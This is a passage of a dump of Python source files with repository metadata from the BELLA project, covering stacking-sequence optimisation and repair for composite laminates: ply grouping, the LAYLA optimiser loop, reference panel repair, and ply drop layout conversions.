parameters.group_size_min.\r\n''')\r\n return n_plies_in_groups, pos_first_ply_groups, n_groups\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.LAYLA_V02.parameters import Parameters\r\n from src.LAYLA_V02.targets import Targets\r\n constraints = Constraints(sym=False, bal=True)\r\n targets = Targets(n_plies=200)\r\n parameters = Parameters(\r\n constraints=constraints,\r\n n_outer_step=5,\r\n group_size_min=3,\r\n group_size_max=6)\r\n n_plies_in_groups, pos_first_ply_groups, n_groups \\\r\n = divide_laminate_asym(parameters, targets)\r\n print(n_plies_in_groups)\r\n print(pos_first_ply_groups)\r\n print(n_groups)\r\n"
},
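The partitioning logic of the record above reduces to a short greedy sketch: take the fewest groups that respect the maximum size, give each group the minimum size, then distribute the leftover plies group by group (the sizes used below are arbitrary):

```python
import math

def partition_plies(n_plies, size_min, size_max):
    """Split n_plies into groups with size_min <= size <= size_max."""
    n_groups = math.ceil(n_plies / size_max)
    if n_groups * size_min > n_plies:
        raise ValueError('no feasible partition with these group sizes')
    groups = [size_min] * n_groups
    extra = n_plies - n_groups * size_min
    for ind in range(n_groups):
        add = min(extra, size_max - size_min)
        groups[ind] += add
        extra -= add
    return groups

print(partition_plies(200, 3, 6))   # 34 groups summing to 200, each of size 3..6
```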
{
"alpha_fraction": 0.6023063659667969,
"alphanum_fraction": 0.6111934185028076,
"avg_line_length": 39.46491241455078,
"blob_id": "f52befa540bf9db81caf0c854625c4b450c3098a",
"content_id": "a6a8e6bfa22887ba7b0480670c7fd3d88546ddfe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9452,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 228,
"path": "/src/LAYLA_V02/optimiser.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction arranging the outer loops of the optimisation technique LAYLA\r\n\r\nFirst outer loop:\r\n Layerwise approach and partial lamination parameters of unknown plies\r\n assumed as 0 (quasi-isotropicity)\r\n\r\nThe refinement loops:\r\n Layerwise approach and partial lamination parameters of unknown plies\r\n calculated based on the orientation of plies at same locations taken from\r\n a previously determined stacking sequence\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\n\r\nfrom src.LAYLA_V02.divide_laminate_sym import divide_laminate_sym\r\nfrom src.LAYLA_V02.divide_laminate_asym import divide_laminate_asym\r\nfrom src.LAYLA_V02.ply_order import calc_ply_order, calc_levels\r\nfrom src.LAYLA_V02.moment_of_areas import calc_mom_of_areas\r\nfrom src.LAYLA_V02.results import LAYLA_Results\r\n\r\nfrom src.LAYLA_V02.outer_step_sym import outer_step_sym\r\nfrom src.LAYLA_V02.outer_step_asym import outer_step_asym\r\n\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.CLA.lampam_functions import calc_lampam_from_delta_lp_matrix\r\nfrom src.CLA.lampam_functions import calc_delta_lampam\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ssI\r\n\r\n\r\ndef LAYLA_optimiser(parameters, constraints, targets,\r\n mat_prop=None, not_constraints=None):\r\n \"\"\"\r\n performs the retrieval of stacking sequences from lamination parameter\r\n targets\r\n\r\n OUTPUTS\r\n\r\n - LAYLA_results: results of the optimisation\r\n\r\n INPUTS\r\n\r\n - parameters: parameters of the optimiser\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n - mat_prop: material properties\r\n \"\"\"\r\n\r\n # details # do not consider\r\n if not_constraints is not None and not constraints.sym:\r\n raise Exception(\"\"\"\r\nSet of constraints that must not be satisfied only accounted for symmetric\r\nlaminates\"\"\")\r\n\r\n # filter the lamination parameters for orthotropy requirements\r\n targets.filter_target_lampams(constraints)\r\n\r\n if constraints.sym:\r\n if targets.n_plies % 2 == 1:\r\n middle_ply = int((targets.n_plies + 1) / 2)\r\n else:\r\n middle_ply = 0\r\n\r\n ply_order = calc_ply_order(constraints, targets)\r\n\r\n # division of the laminates in groups of plies\r\n if constraints.sym:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_sym(parameters, targets, step=0)\r\n else:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_asym(parameters, targets, step=0)\r\n\r\n levels_in_groups = calc_levels(ply_order, n_plies_in_groups, n_groups)\r\n\r\n # mom_areas: signed ply moments of areas\r\n # cummul_mom_areas: cummulated positive ply moments of areas\r\n # group_mom_areas: ply-group positive moments of areas\r\n mom_areas, cummul_mom_areas, group_mom_areas = calc_mom_of_areas(\r\n constraints, targets, ply_order, n_plies_in_groups)\r\n\r\n # lampam_weightings: lamination parameter weightings at each level of the\r\n # search (used in the objective function calculation)\r\n lampam_weightings = parameters.lampam_weightings_final * np.hstack((\r\n np.matlib.repmat(cummul_mom_areas[:, 0][:, np.newaxis], 1, 4),\r\n np.matlib.repmat(cummul_mom_areas[:, 1][:, np.newaxis], 1, 4),\r\n np.matlib.repmat(cummul_mom_areas[:, 2][:, np.newaxis], 1, 4)))\r\n lampam_weightings = np.array([\r\n 
lampam_weightings[ind]/sum(lampam_weightings[ind]) \\\r\n for ind in range(lampam_weightings.shape[0])])\r\n\r\n # calculation of ply partial lamination parameters\r\n if constraints.sym:\r\n delta_lampams = np.empty((targets.n_plies // 2 + targets.n_plies % 2,\r\n constraints.n_set_of_angles, 12), float)\r\n for ind in range(delta_lampams.shape[0]):\r\n delta_lampams[\r\n ind, :, 0:4] = mom_areas[ind, 0] * constraints.cos_sin\r\n delta_lampams[ind, :, 4:8] = 0\r\n delta_lampams[\r\n ind, :, 8:12] = mom_areas[ind, 2] * constraints.cos_sin\r\n else:\r\n delta_lampams = np.empty((\r\n targets.n_plies, constraints.n_set_of_angles, 12), float)\r\n for ind in range(lampam_weightings.shape[0]):\r\n delta_lampams[\r\n ind, :, 0:4] = mom_areas[ind, 0] * constraints.cos_sin\r\n delta_lampams[\r\n ind, :, 4:8] = mom_areas[ind, 1] * constraints.cos_sin\r\n delta_lampams[\r\n ind, :, 8:12] = mom_areas[ind, 2] * constraints.cos_sin\r\n\r\n # asummed lamination parameters for ech ply groups\r\n lampam_assumed = np.zeros((n_groups, 12), float)\r\n\r\n results = LAYLA_Results(parameters, targets)\r\n\r\n for n_outer_step in range(parameters.n_outer_step):\r\n print('n_outer_step', n_outer_step)\r\n\r\n if constraints.sym:\r\n outputs = outer_step_sym(\r\n cummul_mom_areas=cummul_mom_areas,\r\n delta_lampams=delta_lampams,\r\n lampam_weightings=lampam_weightings,\r\n parameters=parameters,\r\n constraints=constraints,\r\n targets=targets,\r\n lampam_assumed=lampam_assumed,\r\n n_plies_in_groups=n_plies_in_groups,\r\n levels_in_groups=levels_in_groups,\r\n middle_ply=middle_ply,\r\n n_groups=n_groups,\r\n mat_prop=mat_prop,\r\n not_constraints=not_constraints)\r\n else:\r\n outputs = outer_step_asym(\r\n cummul_mom_areas=cummul_mom_areas,\r\n delta_lampams=delta_lampams,\r\n lampam_weightings=lampam_weightings,\r\n parameters=parameters,\r\n constraints=constraints,\r\n targets=targets,\r\n lampam_assumed=lampam_assumed,\r\n n_plies_in_groups=n_plies_in_groups,\r\n levels_in_groups=levels_in_groups,\r\n n_groups=n_groups,\r\n mat_prop=mat_prop,\r\n not_constraints=not_constraints)\r\n\r\n lampam_check = calc_lampam_from_delta_lp_matrix(\r\n outputs.ss_best, constraints, delta_lampams)\r\n check_lay_up_rules(outputs.ss_best, constraints)\r\n\r\n if sum(abs(outputs.lampam_best - lampam_check)) > 1e-10:\r\n raise Exception('Lamination parameters not matching lay-up')\r\n\r\n if outputs.ss_best.size != targets.n_plies:\r\n raise Exception('Stacking sequence with incorrect ply count')\r\n\r\n results.ss_tab[n_outer_step] = outputs.ss_best\r\n results.lampam_tab_tab[n_outer_step] = outputs.lampam_best\r\n results.obj_tab[n_outer_step] = outputs.obj_const\r\n# results.n_obj_func_calls_tab[n_outer_step] = outputs.n_obj_func_calls\r\n results.n_designs_last_level_tab[\r\n n_outer_step] = outputs.n_designs_last_level\r\n results.n_designs_repaired_tab[\r\n n_outer_step] = outputs.n_designs_repaired\r\n results.n_designs_repaired_unique_tab[\r\n n_outer_step] = outputs.n_designs_repaired_unique\r\n\r\n # if the stacking sequence is the same or good enough, exit the loop\r\n if n_outer_step == 0:\r\n if outputs.obj_const < 1e-10:\r\n break\r\n elif np.allclose(outputs.ss_best, results.ss_tab[n_outer_step -1]) \\\r\n or outputs.obj_const < 1e-10:\r\n break\r\n\r\n # Repartitioning of the laminate into groups ?\r\n if (n_outer_step != parameters.n_outer_step - 1) \\\r\n and parameters.group_size_max[n_outer_step] \\\r\n != parameters.group_size_max[n_outer_step + 1]:\r\n\r\n # division of the laminates in groups of 
plies\r\n if constraints.sym:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_sym(parameters, targets, step=n_outer_step + 1)\r\n else:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_asym(\r\n parameters, targets, step=n_outer_step + 1)\r\n\r\n mom_areas, cummul_mom_areas, group_mom_areas = calc_mom_of_areas(\r\n constraints, targets, ply_order, n_plies_in_groups)\r\n\r\n levels_in_groups = calc_levels(\r\n ply_order, n_plies_in_groups, n_groups)\r\n\r\n # Updating the table of assumptions for the next step\r\n lampam_assumed = np.zeros((n_groups, 12), float)\r\n for ind_group in range(n_groups):\r\n for ind_ply in range(n_plies_in_groups[ind_group]):\r\n lampam_assumed[ind_group] += delta_lampams[\r\n levels_in_groups[ind_group][ind_ply],\r\n constraints.ind_angles_dict[\r\n outputs.ss_best[\r\n levels_in_groups[ind_group][ind_ply]]]]\r\n\r\n if np.isnan(results.obj_tab).all():\r\n raise Exception('No successful repair during lay-up optimisation')\r\n return results\r\n\r\n ind_mini = np.nanargmin(results.obj_tab)\r\n results.number_of_outer_steps_performed = n_outer_step + 1\r\n results.n_outer_step_best_solution = ind_mini + 1\r\n results.objective = results.obj_tab[ind_mini]\r\n results.ss = results.ss_tab[ind_mini]\r\n results.lampam = results.lampam_tab_tab[ind_mini]\r\n results.completed = True\r\n\r\n return results"
},
{
"alpha_fraction": 0.5623105764389038,
"alphanum_fraction": 0.5692636966705322,
"avg_line_length": 40.816795349121094,
"blob_id": "9190341b54da1421eeda70f4f8ba314ae47db74c",
"content_id": "904939cabc708efd0cace4d3ea69d3fef680f748",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5609,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 131,
"path": "/src/RELAY/repair_reference_panel.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nRepair strategy for reference panel\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.BELLA.format_pdl import convert_ss_ref_to_reduced_sst\r\nfrom src.RELAY.repair_membrane import repair_membrane\r\nfrom src.RELAY.repair_flexural import repair_flexural\r\nfrom src.RELAY.repair_10_bal import repair_10_bal\r\nfrom src.RELAY.repair_10_bal import calc_mini_10\r\nfrom src.RELAY.repair_diso_contig import repair_diso_contig_list\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\n\r\n\r\ndef repair_reference_panel(\r\n multipanel, reduced_ss, constraints, parameters, obj_func_param,\r\n reduced_pdl, mat=0):\r\n \"\"\"\r\n repairs a reference stacking sequence to meet design and manufacturing\r\n guidelines\r\n\r\n The repair process is deterministic and attempts at conducting minimal\r\n modification of the original stacking sequence with a preference for\r\n modifying outer plies that have the least influence on out-of-plane\r\n properties.\r\n\r\n step 1: repair for the 10% rule and balance\r\n step 2: refinement for in-plane lamination parameter convergence\r\n step 3: repair for disorientation and contiguity\r\n step 4: refinement for out-of-plane lamination parameter convergence\r\n\r\n INPUTS\r\n\r\n - n_panels: number of panels in the entire structure\r\n - ss: stacking sequence of the laminate\r\n - multipanel: multipanel structure\r\n - constraints: instance of the class Constraints\r\n - parameters: instance of the class Parameters\r\n - obj_func_param: objective function parameters\r\n - reduced_pdl: reduced ply drop layout\r\n - mat: material properties\r\n \"\"\"\r\n# print_list_ss(reduced_pdl, 60)\r\n\r\n# weight_now = mat.density_area * np.array(\r\n# [outputs.ss[ind_panel].size \\\r\n# for ind_panel in range(multipanel.n_panels)])\r\n# penalty_weight_tab[outer_step] = (\r\n# weight_now - weight_ref) / weight_ref\r\n\r\n ind_ref = multipanel.reduced.ind_ref\r\n ss_ref = reduced_ss[ind_ref]\r\n lampam_target_ref = multipanel.reduced.panels[ind_ref].lampam_target\r\n\r\n mini_10 = calc_mini_10(constraints, ss_ref.size)\r\n #--------------------------------------------------------------------------\r\n # step 1 / repair for the 10% rule and balance\r\n #--------------------------------------------------------------------------\r\n ss_ref, ply_queue = repair_10_bal(ss_ref, mini_10, constraints)\r\n #--------------------------------------------------------------------------\r\n # step 2 / improvement of the in-plane lamination parameter convergence\r\n #--------------------------------------------------------------------------\r\n ss_ref_list, ply_queue_list, _ = repair_membrane(\r\n multipanel=multipanel,\r\n ss=ss_ref,\r\n ply_queue=ply_queue,\r\n mini_10=mini_10,\r\n in_plane_coeffs=multipanel.reduced.panels[ind_ref].lampam_weightingsA,\r\n parameters=parameters,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n lampam_target=lampam_target_ref)\r\n #--------------------------------------------------------------------------\r\n # step 3 / repair for disorientation and contiguity\r\n #--------------------------------------------------------------------------\r\n ss_ref, completed_inward, completed_outward, ind = repair_diso_contig_list(\r\n ss_ref_list, 
ply_queue_list, constraints,\r\n parameters.n_D1)\r\n if not completed_outward:\r\n\r\n reduced_sst = convert_ss_ref_to_reduced_sst(\r\n ss_ref, reduced_pdl=reduced_pdl,\r\n ind_ref=multipanel.reduced.ind_ref,\r\n reduced_ss_before=reduced_ss)\r\n\r\n reduced_lampam = calc_lampam(reduced_ss, constraints)\r\n return False, reduced_lampam, reduced_sst, reduced_ss\r\n #--------------------------------------------------------------------------\r\n #\r\n #--------------------------------------------------------------------------\r\n reduced_sst = convert_ss_ref_to_reduced_sst(\r\n ss_ref, reduced_pdl=reduced_pdl, ind_ref=ind_ref,\r\n reduced_ss_before=reduced_ss)\r\n reduced_ss = convert_sst_to_ss(reduced_sst)\r\n reduced_lampam = calc_lampam(reduced_ss, constraints)\r\n #--------------------------------------------------------------------------\r\n # step 4 / improvement of the out-of-plane lamination parameter convergence\r\n #--------------------------------------------------------------------------\r\n ss_ref = repair_flexural(\r\n ss=ss_ref,\r\n lampam_target=lampam_target_ref,\r\n out_of_plane_coeffs=multipanel.reduced.panels[\r\n ind_ref].lampam_weightingsD,\r\n parameters=parameters,\r\n constraints=constraints,\r\n multipanel=multipanel)\r\n\r\n reduced_sst = convert_ss_ref_to_reduced_sst(\r\n ss_ref, reduced_pdl=reduced_pdl,\r\n ind_ref=multipanel.reduced.ind_ref,\r\n reduced_ss_before=reduced_ss)\r\n\r\n reduced_ss = convert_sst_to_ss(reduced_sst)\r\n reduced_lampam = calc_lampam(reduced_ss, constraints)\r\n\r\n check_lay_up_rules(ss_ref, constraints)\r\n\r\n if (reduced_ss[ind_ref] != ss_ref).any():\r\n print(ss_ref - reduced_ss[ind_ref])\r\n raise Exception(\"\"\"\r\nReference stacking sequence in reduced_ss different from ss_ref\"\"\")\r\n\r\n return True, reduced_lampam, reduced_sst, reduced_ss\r\n"
},
{
"alpha_fraction": 0.5617945790290833,
"alphanum_fraction": 0.5943475365638733,
"avg_line_length": 34.84879684448242,
"blob_id": "4791853759a3a67be082cce6cf81e8e3dd360d87",
"content_id": "ecc614ae24ff41493f4d0f3e9310273d95893a0b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10721,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 291,
"path": "/src/BELLA/format_pdl.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- convert_ss_to_sst\r\n produces a stacking sequence table from stacking sequences and a ply drop\r\n layout\r\n\r\n- convert_sst_to_ss\r\n produces a list of stacking sequences from a stacking sequence table\r\n\r\n- convert_ss_ref_to_reduced_sst\r\n retrieves a reduced stacking sequence table from a modified panel stacking\r\n sequence, a reduced ply drop layout scheme and the previous reduced\r\n stacking sequence list\r\n\r\n- convert_ss_guide_to_sst\r\n retrieves a stacking sequence table from a guide stacking sequence and the\r\n ply drop layout scheme\r\n\r\n- reduce_for_guide_based_blending\r\n returns smaller data structures for a structure with guide-based blending,\r\n either a reduced stacking sequence table, a reduced list of stacking\r\n sequences or a reduced ply drop layout\r\n\r\n- extend_after_guide_based_blending\r\n returns the complete stacking sequence table or the list of stacking\r\n sequences for a structure with guide-based blending\r\n\r\n- pos_in_ss_ref_to_pos_in_sst\r\n converts the positions of plies in the reference panel stacking sequence\r\n into ply positions related to the stacking sequence table\r\n\r\n- pos_in_sst_to_pos_in_panel, pos_in_sst_to_pos_in_panel_2\r\n converts the positions of plies related to a stacking sequence table\r\n into ply positions in a specific panel stacking sequence\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\ndef pos_in_ss_ref_to_pos_in_sst(pos_ref, pdl_ref):\r\n \"\"\"\r\n converts the positions of plies in the reference panel stacking sequence\r\n into ply positions related to the stacking sequence table\r\n\r\n INPUTS\r\n\r\n pos_ref: positions of the plies in the reference panel\r\n pdl_ref: line of the ply drop layout table corresponding to the reference\r\n panel\r\n \"\"\"\r\n if not len(pos_ref):\r\n return []\r\n # to order the positions\r\n ind_sort = np.argsort(pos_ref)\r\n pos_ref = np.copy(pos_ref)[ind_sort]\r\n pos_sst = np.array((), dtype='int16')\r\n counter_pos = 0\r\n counter = 0\r\n for ind_pdl_ply, pdl_ply in enumerate(pdl_ref):\r\n if pdl_ply != -1:\r\n counter += 1\r\n if counter == pos_ref[counter_pos]:\r\n pos_sst = np.hstack((pos_sst, ind_pdl_ply + 1))\r\n counter_pos += 1\r\n if counter_pos == pos_ref.size:\r\n break\r\n\r\n # to retrieve original order of the positions\r\n reorder = [np.where(ind_sort == ind)[0][0] for ind in range(pos_sst.size)]\r\n return pos_sst[reorder]\r\n\r\n\r\ndef pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel):\r\n \"\"\"\r\n converts the positions of plies related to a stacking sequence table\r\n into ply positions in a specific panel stacking sequence\r\n\r\n INPUTS\r\n\r\n - pos_sst: ordered positions of the plies related to the stacking sequence\r\n table\r\n - pdl_panel: line of the ply drop layout table corresponding to the panel\r\n \"\"\"\r\n# print('pos_sst', pos_sst)\r\n# print('pdl_panel', pdl_panel)\r\n pos_panel = np.array((), dtype='int16')\r\n if not len(pos_sst):\r\n return pos_panel\r\n counter_pos_sst = 0\r\n counter_ply_panel = 0\r\n for ind_ply in range(0, pos_sst[-1]):\r\n# print('ind_ply', ind_ply)\r\n# print('counter_pos_sst', counter_pos_sst)\r\n# print('pos_sst[counter_pos_sst]', pos_sst[counter_pos_sst],\r\n# 'ind_ply + 1', ind_ply + 1)\r\n if pos_sst[counter_pos_sst] == ind_ply + 1:\r\n if pdl_panel[ind_ply] != -1:\r\n 
counter_ply_panel += 1\r\n pos_panel = np.hstack((pos_panel, counter_ply_panel))\r\n counter_pos_sst += 1\r\n else:\r\n if pdl_panel[ind_ply] != -1:\r\n counter_ply_panel += 1\r\n# print('pos_panel', pos_panel)\r\n return pos_panel\r\n\r\n\r\ndef pos_in_sst_to_pos_in_panel_2(pos_sst, pdl_panel):\r\n \"\"\"\r\n converts the positions of plies related to a stacking sequence table\r\n into ply positions in a specific panel stacking sequence\r\n\r\n This function is used for input ply positions not necessarily oredered,\r\n the output are either the ply positions in the panel, or 1e10 if the plies\r\n are not in the panel.\r\n\r\n INPUTS\r\n\r\n - pos_sst: positions of the plies related to the stacking sequence\r\n table\r\n - pdl_panel: line of the ply drop layout table corrsponding to the panel\r\n \"\"\"\r\n# print('pos_sst', pos_sst)\r\n# print('pdl_panel', pdl_panel)\r\n pos_panel = np.array((), dtype='int16')\r\n if not len(pos_sst):\r\n return pos_panel\r\n for input_ply_pos in pos_sst:\r\n if pdl_panel[input_ply_pos - 1] == -1:\r\n pos_panel = np.hstack((pos_panel, 1e10))\r\n else:\r\n pos_panel = np.hstack((pos_panel, len(\r\n list(filter(lambda x: (x != -1), pdl_panel[:input_ply_pos])))))\r\n return pos_panel\r\n\r\ndef convert_sst_to_ss(ss_tab):\r\n \"\"\"\r\n converts a stacking sequence table to a list of stacking sequences\r\n \"\"\"\r\n liste = []\r\n for ind_panel in range(len(ss_tab)):\r\n ss_new = np.array((), dtype=int)\r\n for ind_ply in range(ss_tab[ind_panel].size):\r\n if ss_tab[ind_panel][ind_ply] != -1:\r\n ss_new = np.hstack((ss_new, ss_tab[ind_panel][ind_ply]))\r\n liste.append(ss_new)\r\n return liste\r\n\r\n\r\ndef convert_ss_guide_to_sst(ss_guide, pdl):\r\n \"\"\"\r\n retrieves a stacking sequence table from a guide stacking sequence and the\r\n ply drop layout scheme\r\n \"\"\"\r\n sst = -np.ones((pdl.shape[0], pdl.shape[1]), dtype='int16')\r\n for ind in range(ss_guide.size):\r\n to_change = np.where(pdl[:, ind] != -1)[0]\r\n for elem in to_change:\r\n sst[elem][ind] = ss_guide[ind]\r\n return sst\r\n\r\ndef convert_ss_ref_to_reduced_sst(\r\n ss_ref, ind_ref, reduced_pdl, reduced_ss_before):\r\n \"\"\"\r\n retrieves a reduced stacking sequence table from a modified panel stacking\r\n sequence, a reduced ply drop layout scheme and the previous reduced\r\n stacking sequence list\r\n \"\"\"\r\n reduced_sst = convert_ss_to_sst(reduced_ss_before, reduced_pdl)\r\n ind_in_ss_ref = 0\r\n for ind_in_sst in range(reduced_sst.shape[1]):\r\n if reduced_sst[ind_ref, ind_in_sst] != -1:\r\n to_change = np.where(reduced_sst[:, ind_in_sst] != - 1)[0]\r\n for index in to_change:\r\n reduced_sst[index, ind_in_sst] = ss_ref[ind_in_ss_ref]\r\n ind_in_ss_ref += 1\r\n return reduced_sst\r\n\r\n\r\ndef convert_ss_to_sst(ss, pdl):\r\n \"\"\"\r\n retrieves a stacking sequence table from a list of stacking sequence and\r\n the ply drop layout scheme\r\n \"\"\"\r\n return convert_ss_guide_to_sst(ss[-1], pdl)\r\n\r\n\r\ndef reduce_for_guide_based_blending(multipanel, data):\r\n \"\"\"\r\n returns smaller data structures for a structure with guide-based blending,\r\n either a reduced stacking sequence table, a reduced list of stacking\r\n sequences or a reduced ply drop layout\r\n\r\n INPUTS\r\n - multipanel: multi-panel structure\r\n - data: data to be reduced\r\n \"\"\"\r\n if isinstance(data, list):\r\n return [data[multipanel.reduced.ind_for_reduc[ind]] \\\r\n for ind in range(multipanel.reduced.n_panels)]\r\n\r\n return np.array([data[multipanel.reduced.ind_for_reduc[ind]] \\\r\n for 
ind in range(multipanel.reduced.n_panels)])\r\n\r\n\r\ndef extend_after_guide_based_blending(multipanel, reduced_ss):\r\n \"\"\"\r\n returns the complete stacking sequence table or the list of stacking\r\n sequences for a structure with guide-based blending\r\n\r\n INPUTS\r\n - multipanel: multi-panel structure\r\n - reduced_ss: reduced laminate stacking sequences or stacking sequence\r\n table\r\n \"\"\"\r\n if isinstance(reduced_ss, list):\r\n return [reduced_ss[multipanel.reduced.ind_panels_guide[ind]] \\\r\n for ind in range(multipanel.n_panels)]\r\n return np.array([reduced_ss[multipanel.reduced.ind_panels_guide[ind]] \\\r\n for ind in range(multipanel.n_panels)])\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print('\\n*** Test for the function convert_ss_guide_to_sst ***')\r\n ss_guide = np.array([0, 45, 90, -45])\r\n pdl = np.array([[-1, 1, 2, -1], [0, 1, 2, 3]])\r\n print('SS_guide', ss_guide)\r\n print('pdl', pdl)\r\n print(convert_ss_guide_to_sst(ss_guide, pdl))\r\n\r\n print('\\n*** Test for the function convert_sst_to_ss ***')\r\n ss_tab = np.array([\r\n [45, 45, -45, -45, 0, -45, -45, 90, -45, 0, -45, 0, 0, 90],\r\n [45, 45, -45, -45, 0, -1, -45, -45, 90, -45, -45, 0, 0, 90],\r\n [45, 45, -45, -1, 0, -45, -1, -45, 90, -45, -45, 0, 0, 90]])\r\n print_list_ss(convert_sst_to_ss(ss_tab))\r\n\r\n print('\\n*** Test for the function pos_in_ss_ref_to_pos_in_sst ***')\r\n# pos_ref = [3, 5, 7]\r\n# reduced_pdl = np.array([\r\n# [0, -1, -1, 3, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13],\r\n# [0, 1, -1, 3, -1, 5, -1, -1, 8, 9, 10, 11, 12, 13],\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]])\r\n# ind_ref = 1\r\n# expected_answer = [4, 9, 11]\r\n# print(pos_in_ss_ref_to_pos_in_sst(pos_ref, reduced_pdl[ind_ref]))\r\n# print('expected_answer', expected_answer)\r\n\r\n# pos_ref = [7, 3, 5]\r\n# reduced_pdl = np.array([\r\n# [0, -1, -1, 3, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13],\r\n# [0, 1, -1, 3, -1, 5, -1, -1, 8, 9, 10, 11, 12, 13],\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]])\r\n# ind_ref = 1\r\n# expected_answer = [11, 4, 9]\r\n# print(pos_in_ss_ref_to_pos_in_sst(pos_ref, reduced_pdl[ind_ref]))\r\n# print('expected_answer', expected_answer)\r\n\r\n print('\\n*** Test for the function pos_in_sst_to_pos_in_panel ***')\r\n# pos_sst = [4, 9, 11]\r\n# pdl_panel = [0, -1, -1, 3, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13]\r\n# expected_answer = [2, 5, 6]\r\n# print(pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel))\r\n# print('expected_answer', expected_answer)\r\n\r\n# pos_sst = [4, 9, 11]\r\n# pdl_panel = [0, -1, -1, -1, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13]\r\n# expected_answer = [4, 5]\r\n# print(pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel))\r\n# print('expected_answer', expected_answer)\r\n\r\n# pos_sst = [2, 3, 4]\r\n# pdl_panel= [0, 1, 2, -1, -1, 5, 6, 7, 8, 9, -1, -1, 12, 13]\r\n# expected_answer = [2]\r\n# print(pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel))\r\n# print('expected_answer', expected_answer)\r\n\r\n print('\\n*** Test for the function pos_in_sst_to_pos_in_panel_2 ***')\r\n pos_sst = [6, 5]\r\n pdl_panel= [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n expected_answer = [6, 5]\r\n print(pos_in_sst_to_pos_in_panel_2(pos_sst, pdl_panel))\r\n print('expected_answer', expected_answer)"
},
{
"alpha_fraction": 0.5025442242622375,
"alphanum_fraction": 0.5586816072463989,
"avg_line_length": 36.31572341918945,
"blob_id": "18a1ef61744cc2b3d11dfc183e9e3864d6732348",
"content_id": "90b1f7a665d896bfd613ba26e23bb8adccc45377",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 30461,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 795,
"path": "/src/RELAY/repair_10_bal.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nrepair for 10% rule and balance\r\n\r\n- repair_10_bal\r\n repairs a laminate regarding the 10% rule and balance\r\n\r\n- calc_mini_10:\r\n returns the minimum number of plies in the 0/90/+45/-45 directions to\r\n satisfy the 10% rule\r\n\r\n- calc_current_10_2:\r\n returns the current number of plies in the 0/90/+45/-45 directions\r\n\r\n- is_equal\r\n returns True if the set of partial stacking sequence + ply queue matches\r\n the initial stacking sequence\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.divers.pretty_print import print_ss\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\n\r\ndef repair_10_bal(ss_ini, mini_10, constraints):\r\n \"\"\"\r\n repairs a laminate regarding the 10% rule and balance\r\n \"\"\"\r\n if not (constraints.rule_10_percent and constraints.rule_10_Abdalla):\r\n ss, ply_queue = repair_10_bal_2(ss_ini, mini_10, constraints)\r\n return ss, ply_queue\r\n\r\n# print('initial')\r\n# print_ss(ss_ini)\r\n\r\n ## repair for balance\r\n mini_10 = calc_mini_10(constraints, ss_ini.size)\r\n ss, ply_queue = repair_10_bal_2(ss_ini, mini_10, constraints)\r\n\r\n ## repair for 10% 